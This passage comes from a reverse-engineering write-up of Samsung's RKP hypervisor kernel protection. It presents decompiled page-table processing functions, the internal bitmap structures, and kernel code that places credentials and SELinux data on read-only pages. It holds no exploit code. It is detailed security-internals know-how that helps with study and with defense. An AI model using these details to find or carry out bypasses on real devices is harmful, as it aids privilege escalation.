rkp_cmd_get_ro_bitmap allocates a sparse_bitmap_for_kernel_t structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel that will fill it with the information in ro_bitmap. Then it puts its VA into X0, and if a pointer was provided in X2, it will also put it there (using virt_to_phys_el1).

int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
  // ...

  if (!map || !kernel_bitmap)
    return -1;
  kernel_bitmap->start_addr = map->start_addr;
  kernel_bitmap->end_addr = map->end_addr;
  kernel_bitmap->maxn = map->count;
  bitmaps = dynamic_heap_alloc(8 * map->count, 0);
  if (!bitmaps) {
    uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
    return -1;
  }
  if (map->private) {
    uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
    return -1;
  }
  memset(bitmaps, 0, 8 * map->count);
  kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xFFFFFFC000000000;
  index = 0;
  do {
    bitmap = map->entries[index].bitmap;
    if (bitmap)
      bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xFFFFFFC000000000;
    ++index;
  } while (index < kernel_bitmap->maxn);
  return 0;
}

sparsemap_bitmap_kernel takes a sparsemap and will convert all the bitmaps' physical addresses into virtual addresses before copying them into a sparse_bitmap_for_kernel_t structure.

rkp_cmd_get_dbl_bitmap is very similar to rkp_cmd_get_ro_bitmap, but of course instead of sending the bitmaps of the ro_bitmap, it sends those of dbl_bitmap.

The third command, rkp_cmd_get_rkp_get_buffer_bitmap, is also used to retrieve a sparsemap: page_allocator.map. It is called by the kernel in rkp_robuffer_init from init/main.c.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;

static void __init rkp_robuffer_init(void)
{
    rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_robuffer_init();
    // ...
    rkp_init();
    // ...
}

// from include/linux/rkp.h
static inline unsigned int is_rkp_ro_page(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}

To summarize, these bitmaps are used by the kernel to check if some data is protected by RKP (allocated on a read-only page), so that if that is the case, the kernel will need to call one of the RKP commands to modify it.

Page Tables Processing

As a quick reminder, here is the Linux memory layout on Android (4KB pages + 3 levels):

Start           End         Size        Use
-----------------------------------------------------------------------
0000000000000000    0000007fffffffff     512GB      user
ffffff8000000000    ffffffffffffffff     512GB      kernel

And here is the corresponding translation table lookup:

+--------+--------+--------+--------+--------+--------+--------+--------+
|63    56|55    48|47    40|39    32|31    24|23    16|15     8|7      0|
+--------+--------+--------+--------+--------+--------+--------+--------+
 |                 |         |         |         |         |
 |                 |         |         |         |         v
 |                 |         |         |         |   [11:0]  in-page offset
 |                 |         |         |         +-> [20:12] L3 index (PTE)
 |                 |         |         +-----------> [29:21] L2 index (PMD)
 |                 |         +---------------------> [38:30] L1 index (PUD)
 |                 +-------------------------------> [47:39] L0 index (PGD)
 +-------------------------------------------------> [63] TTBR0/1

So keep in mind for this section that we have PGD = PUD = VA[38:30].

Here are the level 0, level 1 and level 2 descriptor formats:

And here is the level 3 descriptor format:

First Level

Processing of the first level tables in done by the rkp_l1pgt_process_table function.

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...

  if (high_bits == 0x1FFFFFF) {
    if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
      rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
      return -1;
    }
  } else {
    if (ID_MAP_PGD == pgd)
      return 0;
  }
  rkp_phys_map_lock(pgd);
  if (is_alloc) {
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    if (high_bits)
      type = KERNEL | L1;
    else
      type = L1;
    res = rkp_phys_map_set(pgd, type);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    res = rkp_s2_page_change_permission(pgd, 0x80, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  } else {
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    res = rkp_phys_map_set(pgd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    res = rkp_s2_page_change_permission(pgd, 0, 1, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  }
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  do {
    desc_p = pgd + entry;
    desc = *desc_p;
    if ((desc & 3) != 3) {
      if (desc)
        set_pxn_bit_of_desc(desc_p, 1);
    } else {
      addr = start_addr & 0xFFFFFF803FFFFFFF | offset;
      res += rkp_l2pgt_process_table(desc & 0xFFFFFFFFF000, addr, is_alloc);
      if (!(start_addr >> 39))
        set_pxn_bit_of_desc(desc_p, 1);
    }
    entry += 8;
    offset += 0x40000000;
    start_addr = addr;
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l1pgt_process_table does the following:

if it is given a PGD for kernel space (TTBR1_EL1);
- it must be tramp_pg_dir or swapper_pg_dir;
- it must also not be deferred initialized.
if it is given a PGD for user space (TTBR0_EL1);
- if it is idmap_pg_dir, it returns early.
then for both kernel and user space;
- if the PGD is being retired;
  - it checks in the physmap that it is indeed a PGD;
  - it marks it as free in the physmap;
  - it makes it RWX in stage 2 (not allowed if initialized).
- if the PGD is being introduced;
  - it checks that is not already marked as a PGD in the physmap;
  - it marks it as such in the physmap;
  - it makes it RO in stage 2 (not allowed if initialized).
- then in both cases, for each entry of the PGD;
  - for blocks, it sets their PXN bit;
  - for tables, it calls rkp_l2pgt_process_table on them;
    - it also sets their PXN bit if VA < 0x8000000000.

Second Level

Processing of the second level tables in done by the rkp_l2pgt_process_table function.

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...

  if (!(start_addr >> 39)) {
    if (!pmd_allocated_by_rkp) {
      if (page_allocator_is_allocated(pmd) == 1)
        pmd_allocated_by_rkp = 1;
      else
        pmd_allocated_by_rkp = -1;
    }
    if (pmd_allocated_by_rkp == -1)
      return 0;
  }
  rkp_phys_map_lock(pmd);
  if (is_alloc) {
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    if (start_addr >> 39)
      type = KERNEL | L2;
    else
      type = L2;
    res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xFF80 | type);
    if (res < 0) {
      rkp_phys_map_unlock(pmd);
      return res;
    }
    res = rkp_s2_page_change_permission(pmd, 0x80, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
      rkp_phys_map_unlock(pmd);
      return res;
    }
  } else {
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    if (table_addr >= 0xFFFFFF8000000000)
      rkp_policy_violation("Never allow free kernel page table %lx", pmd);
    if (is_phys_map_kernel(pmd))
      rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
    res = rkp_phys_map_set(pmd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    res = rkp_s2_page_change_permission(pmd, 0, 1, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
      rkp_phys_map_unlock(pgd);
      return 0;
    }
  }
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xFFFFFFFFC01FFFFF;
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table does the following:

if pmd_allocated_by_rkp is 0 (default value);
- if the PMD was allocated by RKP page allocator, set it to 1;
- otherwise, set pmd_allocated_by_rkp to -1.
if the VA < 0x8000000000 and pmd_allocated_by_rkp is -1, return early;
if the PMD is being retired;
- it checks in the physmap that it is indeed a PMD;
- it double-checks that is not a kernel PMD;
- it marks it as free in the physmap;
- it makes it RWX in stage 2 (not allowed if initialized).
if the PMD is being introduced;
- it checks that is not already marked as a PMD in the physmap;
- it marks it as such in the physmap;
- it makes it RO in stage 2 (not allowed if initialized).
then in both cases, for each entry of the PMD;
- it calls check_single_l2e on them.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...

  if (executable_regions_contains(start_addr, 2)) {
    if (!is_alloc) {
      uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
      uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1FF,
             (start_addr >> 21) & 0x1FF);
      rkp_policy_violation("RKP_d60f7274");
    }
    protect = 1;
  } else {
    set_pxn_bit_of_desc(desc_p, 2);
    protect = 0;
  }
  desc = *desc_p;
  type = *desc & 3;
  if (type == 1)
    return 0;
  if (type != 3) {
    if (desc)
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    return 0;
  }
  if (protect)
    uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1FF,
           (start_addr >> 30) & 0x1FF);
  if (!is_alloc && start_addr >= 0xFFFFFF8000000000) {
    uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1FF,
           (start_addr >> 21) & 0x1FF);
    uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1FFFFFF, 0);
  }
  return rkp_l3pgt_process_table(*desc_p & 0xFFFFFFFFF000, start_addr, is_alloc, protect);
}

check_single_l2e does the following:

if the VA is contained in the executable_regions memlist;
- if the PMD is being retired, trigger a violation;
- otherwise, set the protect flag to 1.
otherwise, set the PXN bit of the descriptor and set protect to 0;
in both cases, if it's a table it calls rkp_l3pgt_process_table.

Third Level

Processing of the third level tables in done by the rkp_l3pgt_process_table function.

int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...

  cs_enter(&l3pgt_lock);
  if (!stext_ptep && ((TEXT ^ start_addr) & 0x7FFFE00000) == 0) {
    stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1FF);
    uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
  }
  cs_exit(&l3pgt_lock);
  if (!protect)
    return 0;
  rkp_phys_map_lock(pte);
  if (is_alloc) {
    if (is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    if (start_addr >> 39)
      type = KERNEL | L3;
    else
      type = L3;
    res = rkp_phys_map_set(pte, type);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    res = rkp_s2_page_change_permission(pte, 0x80, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
      rkp_phys_map_unlock(pte);
      return res;
    }
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          if ((desc & 3) != 3)
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
          if (!executable_regions_contains(addr, 3))
            set_pxn_bit_of_desc(desc_p, 3);
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
               (addr >> 21) & 0x1FF);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  } else {
    if (!is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    res = rkp_phys_map_set(pte, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
    res = rkp_s2_page_change_permission(pte, 0, 1, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
      rkp_phys_map_unlock(pte);
      return res;
    }
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          if ((desc & 3) != 3)
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
          if (executable_regions_contains(addr, 3))
            rkp_policy_violation("RKP_b5438cb1");
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
               (addr >> 21) & 0x1FF);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  }
  rkp_phys_map_unlock(pte);
  return 0;
}

rkp_l3pgt_process_table does the following:

it sets stext_ptep (text section start page table entry pointer?) if this PTE and the kernel text have the same PGD/PUD/PMD index, so if this table span over the kernel text;
if the protect flag is 0, return early, otherwise continue;
if the PTE is being introduced;
- it checks that is not already marked as a PTE in the physmap;
- it marks it as such in the physmap;
- it makes it RO in stage 2 (not allowed if initialized);
- for each entry of the PTE;
  - it triggers a violation if it is not a page;
  - if the VA is not in the executable regions, it sets the PXN bit.
if the PTE is being retired;
- it checks in the physmap that it is indeed a PTE;
- it marks it as free in the physmap;
- it triggers a violation;
- it makes it RWX in stage 2 (not allowed if initialized);
- for each entry of the PTE;
  - it triggers a violation if it is not a page;
  - it triggers a violation if the VA is in the executable regions.

If the page table processing functions find something they consider a policy violation, they call the rkp_policy_violation with a string describing the violation as the first argument.

int64_t rkp_policy_violation(const char* message, ...) {
  // ...

  res = rkp_log(0x4C, "rkp.c", 108, message, /* variable arguments */);
  if (rkp_panic_on_violation)
    uh_panic();
  return res;
}

rkp_policy_violation calls rkp_log and then uh_panic if rkp_panic_on_violation is enabled (it is by default). rkp_log is a wrapper around uh_log that adds the current time and CPU number to the message, and also calls bigdata_store_rkp_string to copy the message to the analytics region.

Let's Recap

To get a better idea of what the overall state of RKP internal structures and hypervisor-controlled page tables looks like after startup is finished, let's go over each of them and what they contain.

Memlist `dynamic_regions`

initialized in uh_init
regions added by S-Boot in init_cmd_add_dynamic_region
dynamic heap region removed in init_cmd_initialize_dynamic_heap

Memlist `protected_ranges`

initialized in pa_restrict_init
0x87000000-0x87200000 (uH region) added in pa_restrict_init
all bitmaps of physmap added in init_cmd_initialize_dynamic_heap

Memlist `page_allocator.list`

initialized in init_cmd_initialize_dynamic_heap
dynamic heap region added in init_cmd_initialize_dynamic_heap

Memlist `executable_regions`

initialized in rkp_start
TEXT-ETEXT added in rkp_start
TRAMP_VALIAS page added in rkp_start
(values are added in dynamic_load_ins)
(values are removed in dynamic_load_rm)

Memlist `dynamic_load_regions`

initialized in rkp_start
(values are added in dynamic_load_add_dynlist)
(values are removed in dynamic_load_rm_dynlist)

Sparsemap `physmap` (based on `dynamic_regions`)

initialized in init_cmd_initialize_dynamic_heap
TEXT-ETEXT set as TEXT in rkp_paging_init
PGDs (TTBR0_EL1) set as L1 in rkp_l1pgt_process_table
PMDs (TTBR0_EL1) set as L2 in rkp_l2pgt_process_table
PTEs (TTBR0_EL1) set as L3 where VA in executable_regions in rkp_l3pgt_process_table
PGDs (swapper|tramp_pg_dir) set as KERNEL|L1 in rkp_l1pgt_process_table
PMDs (swapper|tramp_pg_dir) set as KERNEL|L2 in rkp_l2pgt_process_table
PTEs (swapper|tramp_pg_dir) set as KERNEL|L3 where VA in executable_regions in rkp_l3pgt_process_table
(values are changed in rkp_lxpgt_process_table)
(values are changed in set_range_to_pxn|rox_l3)
(values are changed in rkp_set_pages_ro, rkp_ro_free_pages)

Sparsemap `ro_bitmap` (based on `dynamic_regions`)

initialized in init_cmd_initialize_dynamic_heap
ETEXT-ERODATA set as 1 in rkp_set_kernel_rox
(values are changed in rkp_s2_page_change_permission)
(values are changed in rkp_s2_range_change_permission)

Sparsemap `dbl_bitmap` (based on `dynamic_regions`)

initialized in init_cmd_initialize_dynamic_heap
(values are changed in rkp_set_map_bitmap)

Sparsemap `robuf`/`page_allocator.map` (based on `dynamic_regions`)

initialized in init_cmd_initialize_dynamic_heap
(values are changed in page_allocator_alloc_page)
(values are changed in page_allocator_free_page)

Page tables of EL2 stage 1

0x87100000-0x87140000 (log region) mapped RW in memory_init
0x870FF000-0x87100000 (bigdata region) mapped RW in uh_init_bigdata
end of regions added by S-Boot, 0xA00000000 unmapped in init_cmd_initialize_dynamic_heap
TEXT-ETEXT mapped RO in rkp_paging_init
swapper_pg_dir page mapped RW in rkp_paging_init
(this list doesn't includes changes after startup)

Page tables of EL1 stage 2

dynamic heap region mapped RW in init_cmd_initialize_dynamic_heap
end of regions added by S-Boot, 0xA00000000 unmapped in init_cmd_initialize_dynamic_heap
0x87000000-0x87200000 (uH region) unmapped in rkp_paging_init
empty_zero_page page mapped as RWX in rkp_paging_init
TEXT-ERODATA mapped as RWX in rkp_set_kernel_rox (from rkp_paging_init)
0x87100000-0x87140000 (log region) mapped ROX in rkp_paging_init
dynamic heap region mapped ROX in rkp_paging_init
PGDs (TTBR0_EL1) mapped as RO in rkp_l1pgt_process_table
- PXN bit set on block descriptors
- PXN bit set on table descriptors where VA < 0x8000000000
PMDs (TTBR0_EL1) mapped as RO in rkp_l2pgt_process_table
- PXN bit set on descriptors where VA not in executable_regions in check_single_l2e
PTEs (TTBR0_EL1) mapped as RO where VA in executable_regions in rkp_l3pgt_process_table
TEXT-ERODATA mapped as ROX in rkp_set_kernel_rox (from rkp_deferred_start)
PGDs (swapper|tramp_pg_dir) mapped as RO in rkp_l1pgt_process_table
- PXN bit set on block descriptors
- PXN bit set on table descriptors where VA < 0x8000000000
PMDs (swapper|tramp_pg_dir) mapped as RO in rkp_l2pgt_process_table
- PXN bit set on descriptors where VA not in executable_regions in check_single_l2e
PTEs (swapper|tramp_pg_dir) mapped as RO where VA in executable_regions in rkp_l3pgt_process_table
- PXN bit set on descriptors where VA not in executable_regions
(this list doesn't includes changes after startup)

RKP/KDP Commands

We have seen in the previous sections how RKP manages to take full control of the kernel page tables. We will now see how this is used to protect critical kernel data by allocating it on read-only pages.

Protecting Kernel Data

Global Variables

All the global variables that need to be protected by RKP are annoted with __rkp_ro or __kdp_ro in the kernel sources. That are moved to a section .rkp_ro which is part of the .rodata section of the kernel.

// from include/asm-generic/vmlinux.lds.h
#define RO_DATA_SECTION(align)
// ...
    .rkp_ro          : AT(ADDR(.rkp_ro) - LOAD_OFFSET) {        \
        VMLINUX_SYMBOL(__start_rkp_ro) = .;     \
        *(.rkp_ro)                      \
        VMLINUX_SYMBOL(__stop_rkp_ro) = .;      \
        VMLINUX_SYMBOL(__start_kdp_ro) = .;     \
        *(.kdp_ro)                      \
        VMLINUX_SYMBOL(__stop_kdp_ro) = .;      \
        VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .;     \
        RKP_RO_PGT                      \
        VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .;      \
    }                               \

// from include/linux/linkage.h
#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss      __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro                __section(.rkp_ro)
// ...
#endif

#ifdef CONFIG_RKP_KDP
#define __kdp_ro                __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif

// from arch/arm64/mm/mmu.c
unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
// ...
static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;

// from fs/namespace.c
struct super_block *rootfs_sb __kdp_ro = NULL;
struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;

// from init/main.c
int is_recovery __kdp_ro = 0;
// ...
rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
// ...
int __check_verifiedboot __kdp_ro = 0;
// ...
extern int ss_initialized __kdp_ro;

// from kernel/cred.c
int rkp_cred_enable __kdp_ro = 0;
// ...
struct cred init_cred __kdp_ro = { /* ... */ };

// from security/selinux/hooks.c
struct task_security_struct init_sec __kdp_ro;
// ...
//int selinux_enforcing __kdp_ro;
// ...
int selinux_enabled __kdp_ro = 1;
// ...
static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };

// from security/selinux/ss/services.c
int ss_initialized __kdp_ro;

Dynamic Allocations

In addition to protecting global variables, RKP also protects 3 caches of the SLUB allocator by using for those read-only pages returned by RKP instead of pages returned by the page allocator. The 3 caches are:

cred_jar_ro used for allocating struct cred;
tsec_jar used for allocating struct task_security_struct;
vfsmnt_cache used for allocating struct vfsmount.

// from include/linux/rkp.h
#define CRED_JAR_RO     "cred_jar_ro"
#define TSEC_JAR        "tsec_jar"
#define VFSMNT_JAR      "vfsmnt_cache"

typedef struct ns_param {
    u32 ns_buff_size;
    u32 ns_size;
    u32 bp_offset;
    u32 sb_offset;
    u32 flag_offset;
    u32 data_offset;
}ns_param_t;

#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data)  \
do {                        \
    nsparam.ns_buff_size = (u64)buff_size;      \
    nsparam.ns_size  = (u64)size;       \
    nsparam.bp_offset = (u64)bp;        \
    nsparam.sb_offset = (u64)sb;        \
    nsparam.flag_offset = (u64)flag;        \
    nsparam.data_offset = (u64)data;        \
} while(0)

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}

static inline void *rkp_ro_alloc(void){
    u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
    if(!addr)
        return 0;
    return (void *)__phys_to_virt(addr);
}

static inline void rkp_ro_free(void *free_addr){
    uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}

// from mm/slub.c
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    // ...
    if (rkp_cred_enable && s->name &&
        (!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
                                    !strcmp(s->name, VFSMNT_JAR))) {
        uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
            (u64)freelist_ptr(s, fp, freeptr_addr), 0);
    }
    // ...
}

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
    // ...
    if (s->name &&
        (!strcmp(s->name, CRED_JAR_RO) ||
        !strcmp(s->name, TSEC_JAR)||
        !strcmp(s->name, VFSMNT_JAR))) {

        virt_page = rkp_ro_alloc();
        if(!virt_page)
            goto def_alloc;

        page = virt_to_page(virt_page);
        oo = s->min;
    } else {
    // ...
    /*
     * We modify the following so that slab alloc for protected data
     * types are allocated from our own pool.
     */
    if (s->name)  {
        u64 sc,va_page;
        va_page = (u64)__va(page_to_phys(page));

        if(!strcmp(s->name, CRED_JAR_RO)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, TSEC_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, VFSMNT_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
    }
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
    // ...
}

static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
    unsigned long flags;
    unsigned long long sc,va_page;

    sc = 0;
    va_page = (unsigned long long)__va(page_to_phys(page));
    if(is_rkp_ro_page(va_page)){
        for(sc = 0; sc < (1 << order); sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
            rkp_ro_free((void *)va_page);
            va_page += PAGE_SIZE;
        }
        return;
    }

    spin_lock_irqsave(&ro_pages_lock,flags);
    for(sc = 0; sc < (1 << order); sc++) {
        uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
        va_page += PAGE_SIZE;
    }
    memcg_uncharge_slab(page, order, s);
    __free_pages(page, order);
    spin_unlock_irqrestore(&ro_pages_lock,flags);
}

static void __free_slab(struct kmem_cache *s, struct page *page)
{
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
    // ...
    /* We free the protected pages here. */
    if (s->name && (!strcmp(s->name, CRED_JAR_RO) ||
        !strcmp(s->name, TSEC_JAR) ||
        !strcmp(s->name, VFSMNT_JAR))){
        free_ro_pages(s,page, order);
        return;
    }
    // ...
}

// from kernel/cred.c
void __init cred_init(void)
{
    /* allocate a slab in which we can store credentials */
    cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
            SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
#ifdef  CONFIG_RKP_KDP
    if(rkp_cred_enable) {
        cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
        if(!cred_jar_ro) {
            panic("Unable to create RO Cred cache\n");
        }

        tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
        if(!tsec_jar) {
            panic("Unable to create RO security cache\n");
        }

        usecnt_jar = kmem_cache_create("usecnt_jar", sizeof(atomic_t) + sizeof(struct ro_rcu_head),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, usecnt_ctor);
        if(!usecnt_jar) {
            panic("Unable to create use count jar\n");
        }
        uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
    }
#endif  /* CONFIG_RKP_KDP */
}

// from fs/namespace.c
void __init mnt_init(void)
{
    // ...
    vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
            0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);

    if(!vfsmnt_cache)
        panic("Failed to allocate vfsmnt_cache \n");

    rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
                                        (u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
                                        (u64)offsetof(struct vfsmount,data));
    uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
  // ...
}

// from fs/dcache.c
void __init vfs_caches_init(void)
{
    // ...
    mnt_init();
    // ...
}

// from init/main.c
asmlinkage __visible void __init start_kernel(void)
{
    // ...
    if (rkp_cred_enable)
        kdp_init();
    cred_init();
    // ...
    vfs_caches_init();
    // ...
}

Let's summarize which commands are used by the SLUB allocator:

Command	Function	Description
`RKP_RKP_ROBUFFER_ALLOC`	`rkp_cmd_rkp_robuffer_alloc`	Allocate a read-only page
`RKP_RKP_ROBUFFER_FREE`	`rkp_cmd_rkp_robuffer_free`	Free a read-only page
`RKP_KDP_X50`	`rkp_cmd_set_pages_ro_cred_jar`	Mark a slab of `cred_jar`
`RKP_KDP_X4E`	`rkp_cmd_set_pages_ro_tsec_jar`	Mark a slab of `tsec_jar`
`RKP_KDP_X4F`	`rkp_cmd_set_pages_ro_vfsmnt_jar`	Mark a slab of `vfsmnt_jar`
`RKP_KDP_X48`	`rkp_cmd_ro_free_pages`	Unmark a slab
`RKP_KDP_X42`	`rkp_cmd_assign_cred_size`	Inform of the cred objects size
`RKP_KDP_X41`	`rkp_cmd_assign_ns_size`	Inform of the ns objects size
`RKP_KDP_X44`	`rkp_cmd_cred_set_fp`	Set the freelist pointer inside an object
`RKP_KDP_X4A`	`rkp_cmd_prot_dble_map`	Prevent double mapping

